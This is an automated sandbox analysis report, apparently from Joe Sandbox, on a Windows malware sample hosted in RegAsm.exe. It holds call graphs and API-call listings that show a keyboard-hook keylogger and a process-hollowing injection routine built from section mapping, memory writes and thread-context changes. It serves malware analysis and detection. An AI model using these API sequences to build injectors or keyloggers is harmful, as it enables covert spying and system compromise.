434954 55076->55078 55398 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 55076->55398 55086 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 55078->55086 55399 4442d2 5 API calls CatchGuardHandler 55078->55399 55080 43496d 55082 434973 ___DestructExceptionObject 55080->55082 55400 444276 5 API calls CatchGuardHandler 55080->55400 55083 4349f3 55111 434ba5 55083->55111 55086->55083 55401 443487 36 API calls 5 library calls 55086->55401 55101 434630 55100->55101 55406 434cb6 IsProcessorFeaturePresent 55101->55406 55103 43463c 55407 438fb1 10 API calls 4 library calls 55103->55407 55105 434641 55106 434645 55105->55106 55408 44415f 55105->55408 55106->55076 55109 43465c 55109->55076 55112 436f10 ___scrt_fastfail 55111->55112 55113 434bb8 GetStartupInfoW 55112->55113 55114 4349f9 55113->55114 55115 444223 55114->55115 55464 44f0d9 55115->55464 55117 44422c 55119 434a02 55117->55119 55468 446895 36 API calls 55117->55468 55120 40ea00 55119->55120 55470 41cbe1 LoadLibraryA GetProcAddress 55120->55470 55122 40ea1c GetModuleFileNameW 55475 40f3fe 55122->55475 55124 40ea38 55125 4020f6 28 API calls 55124->55125 55126 40ea47 55125->55126 55127 4020f6 28 API calls 55126->55127 55128 40ea56 55127->55128 55129 41beac 28 API calls 55128->55129 55130 40ea5f 55129->55130 55490 40fb52 55130->55490 55132 40ea68 55133 401e8d 11 API calls 55132->55133 55134 40ea71 55133->55134 55135 40ea84 55134->55135 55136 40eace 55134->55136 55668 40fbee 118 API calls 55135->55668 55138 401e65 22 API calls 55136->55138 55139 40eade 55138->55139 55143 401e65 22 API calls 55139->55143 55140 40ea96 55141 401e65 22 API calls 55140->55141 55142 40eaa2 55141->55142 55669 410f72 36 API calls __EH_prolog 55142->55669 55144 40eafd 55143->55144 55145 40531e 28 API calls 55144->55145 55147 40eb0c 55145->55147 55149 406383 28 API calls 55147->55149 55148 40eab4 55670 40fb9f 78 API calls 55148->55670 55151 40eb18 55149->55151 55153 401fe2 28 API calls 55151->55153 55152 40eabd 55671 40f3eb 71 API calls 55152->55671 55155 40eb24 55153->55155 55156 401fd8 11 API calls 55155->55156 55157 40eb2d 55156->55157 55159 401fd8 11 API calls 55157->55159 55161 40eb36 55159->55161 55162 401e65 22 API calls 55161->55162 55163 40eb3f 55162->55163 55164 401fc0 28 API calls 55163->55164 55165 40eb4a 55164->55165 55166 401e65 22 API calls 55165->55166 55167 40eb63 55166->55167 55168 401e65 22 API calls 55167->55168 55169 40eb7e 55168->55169 55170 40ebe9 55169->55170 55672 406c59 55169->55672 55171 401e65 22 API calls 55170->55171 55177 40ebf6 55171->55177 55173 40ebab 55174 401fe2 28 API calls 55173->55174 55175 40ebb7 55174->55175 55176 401fd8 11 API calls 55175->55176 55179 40ebc0 55176->55179 55178 40ec3d 55177->55178 55182 413584 3 API calls 55177->55182 55494 40d0a4 55178->55494 55677 413584 RegOpenKeyExA 55179->55677 55189 40ec21 55182->55189 55188 40f38a 55767 4139e4 30 API calls 55188->55767 55189->55178 55680 4139e4 30 API calls 55189->55680 55197 40f3a0 55768 4124b0 65 API calls ___scrt_fastfail 55197->55768 55398->55076 55399->55080 55400->55086 55401->55083 55406->55103 55407->55105 55412 44fbe8 55408->55412 55411 438fda 8 API calls 3 library calls 55411->55106 55413 44fc05 55412->55413 55416 44fc01 55412->55416 55413->55416 55418 449d26 55413->55418 55415 43464e 55415->55109 55415->55411 55430 43502b 55416->55430 55419 449d32 ___DestructExceptionObject 55418->55419 55437 445909 EnterCriticalSection 55419->55437 55421 449d39 55438 450203 55421->55438 55423 449d48 55424 449d57 55423->55424 55449 449bba 23 API calls 55423->55449 55451 449d73 LeaveCriticalSection std::_Lockit::~_Lockit 55424->55451 55427 449d52 55450 449c70 GetStdHandle GetFileType 55427->55450 55428 449d68 ___DestructExceptionObject 55428->55413 55431 435036 IsProcessorFeaturePresent 55430->55431 55432 435034 55430->55432 55434 435078 55431->55434 55432->55415 55463 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 55434->55463 55436 43515b 55436->55415 55437->55421 55439 45020f ___DestructExceptionObject 55438->55439 55440 450233 55439->55440 55441 45021c 55439->55441 55452 445909 EnterCriticalSection 55440->55452 55460 44062d 20 API calls _Atexit 55441->55460 55444 45026b 55461 450292 LeaveCriticalSection std::_Lockit::~_Lockit 55444->55461 55445 450221 ___DestructExceptionObject ___std_exception_copy 55445->55423 55446 45023f 55446->55444 55453 450154 55446->55453 55449->55427 55450->55424 55451->55428 55452->55446 55454 445b74 __Getctype 20 API calls 55453->55454 55455 450166 55454->55455 55459 450173 55455->55459 55462 448b04 11 API calls 2 library calls 55455->55462 55456 446802 _free 20 API calls 55458 4501c5 55456->55458 55458->55446 55459->55456 55460->55445 55461->55445 55462->55455 55463->55436 55465 44f0eb 55464->55465 55466 44f0e2 55464->55466 55465->55117 55469 44efd8 49 API calls 4 library calls 55466->55469 55468->55117 55469->55465 55471 41cc20 LoadLibraryA GetProcAddress 55470->55471 55472 41cc10 GetModuleHandleA GetProcAddress 55470->55472 55473 41cc49 44 API calls 55471->55473 55474 41cc39 LoadLibraryA GetProcAddress 55471->55474 55472->55471 55473->55122 55474->55473 55769 41b539 FindResourceA 55475->55769 55478 43bda0 ___std_exception_copy 21 API calls 55479 40f428 ctype 55478->55479 55480 4020b7 28 API calls 55479->55480 55481 40f443 55480->55481 55482 401fe2 28 API calls 55481->55482 55483 40f44e 55482->55483 55484 401fd8 11 API calls 55483->55484 55485 40f457 55484->55485 55486 43bda0 ___std_exception_copy 21 API calls 55485->55486 55487 40f468 ctype 55486->55487 55488 406e13 28 API calls 55487->55488 55489 40f49b 55488->55489 55489->55124 55491 40fb5e 55490->55491 55493 40fb65 55490->55493 55772 402163 11 API calls 55491->55772 55493->55132 55773 401fab 55494->55773 55668->55140 55669->55148 55670->55152 55673 4020df 11 API calls 55672->55673 55674 406c65 55673->55674 55675 4032a0 28 API calls 55674->55675 55676 406c82 55675->55676 55676->55173 55678 40ebdf 55677->55678 55679 4135ae RegQueryValueExA RegCloseKey 55677->55679 55678->55170 55678->55188 55679->55678 55680->55178 55767->55197 55770 41b556 LoadResource LockResource SizeofResource 55769->55770 55771 40f419 55769->55771 55770->55771 55771->55478 55772->55493 56065 40165e 56066 401666 56065->56066 56069 401669 56065->56069 56067 4016a8 56068 43455e new 22 API calls 56067->56068 56070 40169c 56068->56070 56069->56067 56071 401696 56069->56071 56072 43455e new 22 API calls 56071->56072 56072->56070 56073 426cdc 56078 426d59 send 56073->56078 56079 40a2df 56082 40a3a2 56079->56082 56081 40a2f0 56083 40a402 CallNextHookEx 56082->56083 56084 40a3bf 56082->56084 56083->56081 56085 40a3ca 56084->56085 56086 40a3eb 56084->56086 56087 40a3dd 56085->56087 56088 40a3cf 56085->56088 56095 40b25c 56086->56095 56153 40b6db 30 API calls 56087->56153 56088->56083 56152 40b681 38 API calls 56088->56152 56092 40a3db 56092->56083 56098 40b26b 56095->56098 56096 402093 28 API calls 56097 40b4f8 56096->56097 56154 40a64c 29 API calls 56097->56154 56098->56096 56099 40a3f7 56098->56099 56099->56083 56101 40b528 56099->56101 56102 40b542 56101->56102 56103 40b66b 56101->56103 56105 40b5c6 56102->56105 56106 40b548 56102->56106 56155 40a41b 56103->56155 56109 402093 28 API calls 56105->56109 56107 40b669 56106->56107 56112 402093 28 API calls 56106->56112 56107->56083 56111 40b5d4 56109->56111 56113 402093 28 API calls 56111->56113 56114 40b570 56112->56114 56115 40b5e2 56113->56115 56165 43fd16 44 API calls 56114->56165 56117 41bcef 28 API calls 56115->56117 56119 40b5f2 56117->56119 56118 40b57e 56120 402093 28 API calls 56118->56120 56168 40b749 31 API calls 56119->56168 56122 40b58e 56120->56122 56166 4091d8 28 API calls 56122->56166 56123 40b605 56125 41bcef 28 API calls 56123->56125 56127 40b613 56125->56127 56126 40b599 56128 402ea1 28 API calls 56126->56128 56129 402fa5 28 API calls 56127->56129 56130 40b5a3 56128->56130 56131 40b61e 56129->56131 56167 40a64c 29 API calls 56130->56167 56133 402fa5 28 API calls 56131->56133 56134 40b628 56133->56134 56169 40a671 12 API calls 56134->56169 56135 40b5ab 56137 401fd8 11 API calls 56135->56137 56139 40b5b4 56137->56139 56138 40b630 56141 401f09 11 API calls 56138->56141 56140 401fd8 11 API calls 56139->56140 56151 40b5bd 56140->56151 56142 40b639 56141->56142 56143 401f09 11 API calls 56142->56143 56144 40b642 56143->56144 56146 401f09 11 API calls 56144->56146 56145 401fd8 11 API calls 56145->56107 56147 40b64b 56146->56147 56148 401f09 11 API calls 56147->56148 56149 40b657 56148->56149 56150 401fd8 11 API calls 56149->56150 56150->56151 56151->56145 56152->56092 56153->56092 56154->56099 56156 436f10 ___scrt_fastfail 56155->56156 56157 40a43c 6 API calls 56156->56157 56158 40a511 56157->56158 56159 40a4a3 ___scrt_fastfail 56157->56159 56160 40a521 ToUnicodeEx 56158->56160 56161 40a508 56159->56161 56163 40a4df ToUnicodeEx 56159->56163 56160->56160 56160->56161 56162 40417e 28 API calls 56161->56162 56164 40a550 56162->56164 56163->56161 56170 40a671 12 API calls 56164->56170 56165->56118 56166->56126 56167->56135 56168->56123 56169->56138 56170->56107

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                                                                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                                                                          • API String ID: 4236061018-3687161714
                                                                                                                                                                                          • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                                                                                                                          • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                                                                                                                          • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 448 41812a-418153 449 418157-4181be GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 4181c4-4181cb 449->450 451 4184bb 449->451 450->451 453 4181d1-4181d8 450->453 452 4184bd-4184c7 451->452 453->451 454 4181de-4181e0 453->454 454->451 455 4181e6-418213 call 436f10 * 2 454->455 455->451 460 418219-418224 455->460 460->451 461 41822a-41825a CreateProcessW 460->461 462 418260-418288 VirtualAlloc Wow64GetThreadContext 461->462 463 4184b5 GetLastError 461->463 464 41847f-4184b3 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->464 465 41828e-4182ae ReadProcessMemory 462->465 463->451 464->451 465->464 466 4182b4-4182d6 NtCreateSection 465->466 466->464 467 4182dc-4182e9 466->467 468 4182eb-4182f6 NtUnmapViewOfSection 467->468 469 4182fc-41831e NtMapViewOfSection 467->469 468->469 470 418320-41835d VirtualFree NtClose TerminateProcess 469->470 471 418368-41838f GetCurrentProcess NtMapViewOfSection 469->471 470->449 472 418363 470->472 471->464 473 418395-418399 471->473 472->451 474 4183a2-4183c0 call 436990 473->474 475 41839b-41839f 473->475 478 418402-41840b 474->478 479 4183c2-4183d0 474->479 475->474 480 41842b-41842f 478->480 481 41840d-418413 478->481 482 4183d2-4183f5 call 436990 479->482 484 418431-41844e WriteProcessMemory 480->484 485 418454-41846b Wow64SetThreadContext 480->485 481->480 483 418415-418428 call 41853e 481->483 491 4183f7-4183fe 482->491 483->480 484->464 489 418450 484->489 485->464 490 41846d-418479 ResumeThread 485->490 489->485 490->464 493 41847b-41847d 490->493 491->478 493->452
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                                                                                                                                                          • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
                                                                                                                                                                                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00418328
                                                                                                                                                                                          • NtClose.NTDLL(?), ref: 00418332
                                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 00418470
                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                                                                                                                                          • NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
                                                                                                                                                                                          • NtClose.NTDLL(?), ref: 004184A3
                                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004184B5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                                                                                                                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                                                                                          • API String ID: 3150337530-3035715614
                                                                                                                                                                                          • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                                                                                                                          • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                                                                                                                                                          • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                                                                                                                          • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 1848 40a2f3-40a30a 1849 40a30c-40a326 GetModuleHandleA SetWindowsHookExA 1848->1849 1850 40a36e-40a37e KiUserCallbackDispatcher 1848->1850 1849->1850 1853 40a328-40a36c GetLastError call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1849->1853 1851 40a380-40a398 TranslateMessage DispatchMessageA 1850->1851 1852 40a39a 1850->1852 1851->1850 1851->1852 1854 40a39c-40a3a1 1852->1854 1853->1854
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                                                                                                                                          • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040A328
                                                                                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0040A376
                                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0040A385
                                                                                                                                                                                          • DispatchMessageA.USER32(?), ref: 0040A390
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Keylogger initialization failure: error , xrefs: 0040A33C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Message$CallbackDispatchDispatcherErrorHandleHookLastLocalModuleTimeTranslateUserWindows
                                                                                                                                                                                          • String ID: Keylogger initialization failure: error
                                                                                                                                                                                          • API String ID: 941179788-952744263
                                                                                                                                                                                          • Opcode ID: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                                                                                                                                                                                          • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1840779552.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1839943215.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1840779552.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_10000000_RegAsm.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1083526818-0
                                                                                                                                                                                          • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                                          • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                                                                                          • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                                          • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                                                                                                                                          • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?,0040D2DD,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                                                                                                                                                                          • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                                                                                                                                                            • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                                                                                                                                                          • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
